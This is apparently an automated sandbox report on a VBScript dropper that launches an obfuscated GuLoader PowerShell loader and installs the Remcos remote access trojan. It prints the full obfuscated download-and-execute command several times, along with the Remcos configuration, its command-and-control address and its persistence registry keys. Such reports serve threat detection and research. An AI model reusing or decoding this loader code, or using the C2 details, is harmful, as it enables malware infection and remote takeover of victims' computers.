Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Brooming.vbs

Overview

General Information

Sample name:Brooming.vbs
Analysis ID:1578025
MD5:fbcaeb4144c55d299c7703277c01c329
SHA1:bc1b38c0454d1badf6ce204029a856a971f156c1
SHA256:6c6329c8ab3fa52c199cbbf9b270f8faaa05dc74d7f78cbd5ac8bbea61ef49bc
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2704 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4000 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • remcos.exe (PID: 5932 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 6116 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 7164 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["154.216.20.209:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BNP8PO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2613266468.00000000080C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.2613657246.000000000BA9B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000004.00000002.2599993582.000000000549C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_3664.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_2704.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc2f3:$b2: ::FromBase64String(
              • 0xb3a3:$s1: -join
              • 0x4b4f:$s4: +=
              • 0x4c11:$s4: +=
              • 0x8e38:$s4: +=
              • 0xaf55:$s4: +=
              • 0xb23f:$s4: +=
              • 0xb385:$s4: +=
              • 0x157a8:$s4: +=
              • 0x15828:$s4: +=
              • 0x158ee:$s4: +=
              • 0x1596e:$s4: +=
              • 0x15b44:$s4: +=
              • 0x15bc8:$s4: +=
              • 0xbb96:$e4: Get-WmiObject
              • 0xbd85:$e4: Get-Process
              • 0xbddd:$e4: Start-Process
              • 0x16413:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", ProcessId: 1592, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-BNP8PO
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.86.72, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4000, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49820
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", ProcessId: 1592, ProcessName: wscript.exe
              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4000, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-BNP8PO
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu 